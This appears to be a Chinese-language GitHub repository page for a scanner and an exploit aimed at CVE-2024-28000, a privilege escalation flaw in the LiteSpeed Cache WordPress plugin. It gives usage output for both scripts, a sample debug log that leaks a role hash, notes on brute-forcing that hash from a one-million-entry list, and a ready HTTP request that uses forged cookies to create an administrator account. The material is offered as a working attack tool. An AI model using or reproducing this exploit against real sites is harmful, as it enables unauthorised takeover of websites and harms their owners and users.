Skip to content

CVE-2024-28000 LiteSpeed Cache Privilege Escalation Scan&Exp

Notifications You must be signed in to change notification settings

SSSSuperX/CVE-2024-28000

Repository files navigation

LiteSpeed Cache Privilege Escalation Exp

CVE-2024-28000_Scan.py

  • 该脚本首先会识别版本,判断是否为易损版本,后尝试确认log文件是否存在,若存在,则会尝试发包后再次请求log文件尝试查找hash泄露,若LiteSpeed启用debug,则有可能泄露正确Hash
usage: CVE-2024-28000_Scan.py [-h] [-f F] [-t T] [-p PROXY]

CVE-2024-28000 Scan

optional arguments:
  -h, --help            show this help message and exit
  -f F                  File list
  -t T                  Scan thread
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808

示例:

09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] 💓 ------POST HTTP/1.1 (HTTPS)  /wp-json/wp/v2/users
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] Query String: 
09/08/24 16:30:38.231 [0.0.0.0:26008 1 TG9] [Router] starting role validation
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] get_role: 
09/08/24 16:30:38.241 [0.0.0.0:26008 1 TG9] [Optm] init

若LiteSpeed启用debug,则可能看到类似的上面的日志,其中pkHrfD则为正确Hash

CVE-2024-28000_Exploit.py

  • 经测试 Python和PHP生成的Hash是有差异的,故Hash列表并不能用Python模拟生成,Hash_list.txt文件为php生成的1000000个Hash,所以理论上遍历最高1000000次则可以遍历到正确Hash
usage: CVE-2024-28000_Exploit.py [-h] [-u U] [-t T] [-d D] [-p PROXY]

CVE-2024-28000

optional arguments:
  -h, --help            show this help message and exit
  -u U                  url
  -t T                  Scan thread
  -d D                  Dict list
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
  • -d参数则为Hash列表 -u为url -t为线程数,线程不建议过高

测试

  • 在靶场测试是可以成功遍历出Hash,并且重装五遍都已经确认Hash是在生成的Hash列表中的,但是多种方面表面实战利用成功率较低
  • 在成功找到正确Hash后可用下面的数据包添加admin用户
POST /wp-json/wp/v2/users HTTP/2
Host: xxx.com
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Cookie: litespeed_hash=正确Hash; litespeed_role=1
Content-Length: 122
Content-Type: application/json

{"username": "username", "password": "password", "email": "xadminx@example.com", "roles": ["administrator"]}

About

CVE-2024-28000 LiteSpeed Cache Privilege Escalation Scan&Exp

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages